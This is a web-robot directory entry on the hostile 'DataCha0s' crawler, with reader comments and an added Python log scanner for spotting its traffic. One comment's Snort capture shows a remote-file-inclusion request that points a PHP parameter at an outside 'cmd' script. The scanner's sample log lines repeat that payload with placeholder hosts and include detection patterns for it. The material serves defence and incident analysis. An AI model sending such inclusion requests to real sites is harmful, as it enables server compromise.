DataCha0s
Owner of the robot : unknown
Country : Brazil
Robot type : hostile robot
Description : A Brazilian web site claims ownership of the DataCha0s robot. According to the site, the robot is operated by a group of young Brazilian hackers. They claim to have hacked 150 web sites. The robot searches for security weaknesses in popular applications.
User Agent transmitted to the visited web server :
- DataCha0s/2.0
Access control options understood by the robot :
- none
User Agent to use in the robots.txt file : unknown
URLs for more information :


July 19th, 2007 at 2:52 pm
This robot seems to be doing PHP injection attacks as well. Snort packet capture:
07/19-02:12:29.380290 200.215.129.70:44232 -> 129.97.128.84:80
TCP TTL:47 TOS:0x0 ID:12084 IpLen:20 DgmLen:239 DF
***AP*** Seq: 0xF2D04426 Ack: 0x225106 Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1411345356 2713027245
47 45 54 20 2F 68 69 73 74 6F 72 79 2F 63 6F 6D GET /history/com
70 6C 65 74 65 73 65 61 73 6F 6E 64 65 74 61 69 pleteseasondetai
6C 73 2E 70 68 70 3F 53 65 61 73 6F 6E 3D 68 74 ls.php?Season=ht
74 70 3A 2F 2F 77 77 77 2E 75 6E 6C 6F 63 6B 70 tp://www.unlockp
6C 61 7A 61 2E 6E 6C 2F 6D 65 64 69 61 2F 63 6D laza.nl/media/cm
64 3F 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E d? HTTP/1.0..Con
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
55 73 65 72 2D 41 67 65 6E 74 3A 20 44 61 74 61 User-Agent: Data
43 68 61 30 73 2F 32 2E 30 0D 0A 48 6F 73 74 3A Cha0s/2.0..Host:
20 77 77 77 2E 77 61 72 72 69 6F 72 6D 65 6E 73  www.warriormens
62 61 73 6B 65 74 62 61 6C 6C 2E 75 77 61 74 65 basketball.uwate
72 6C 6F 6F 2E 63 61 0D 0A 0D 0A rloo.ca....
The content they’re trying to inject is clearly malicious:
Angels of Death > #AoD > irc.gigachat.net > CMD > File List

July 25th, 2007 at 4:39 pm
DataCha0s seems to be a small group of Brazilian hackers. Their brag page is here:
http://www.invasao.com.br/grupo04.htm
I’m seeing lots of different attacks. I assume some common code they’re sharing.
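
Added example (not part of the original entry or its comments): a small access-log scanner that flags the two traits visible in the capture above, the DataCha0s User-Agent and a query parameter whose value is itself a URL. The combined log format, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed input: Apache/Nginx "combined" access-log lines.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
BOT_UA = re.compile(r"^DataCha0s/", re.I)               # User-Agent listed in this entry
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.I)  # parameter value is itself a URL


def classify(line):
    """Return (client_ip, reasons) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if BOT_UA.match(m.group("ua")):
        reasons.append("datacha0s-user-agent")
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too.
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            reasons.append("url-in-parameter:" + name)
    return (m.group("ip"), reasons) if reasons else None


def scan(lines):
    """Classify every line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample lines: documentation IP ranges and placeholder hosts.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jul/2007:02:12:29 -0400] "GET /history/completeseasondetails.php'
    '?Season=http://files.example.org/cmd? HTTP/1.0" 200 512 "-" "DataCha0s/2.0"',
    '198.51.100.7 - - [19/Jul/2007:02:13:01 -0400] "GET /index.php'
    '?page=http%3A%2F%2Ffiles.example.org%2Fcmd.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [19/Jul/2007:02:14:40 -0400] "GET /history/completeseasondetails.php'
    '?Season=2006 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [19/Jul/2007:02:15:12 -0400] "GET / HTTP/1.0" 200 1024 "-" "datacha0s/2.0"',
]

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The URL-in-parameter check also matches legitimate redirect or callback parameters, so treat those hits as leads to review rather than confirmed attacks. The User-Agent string is trivially changed by the sender, which is why the second check does not depend on it.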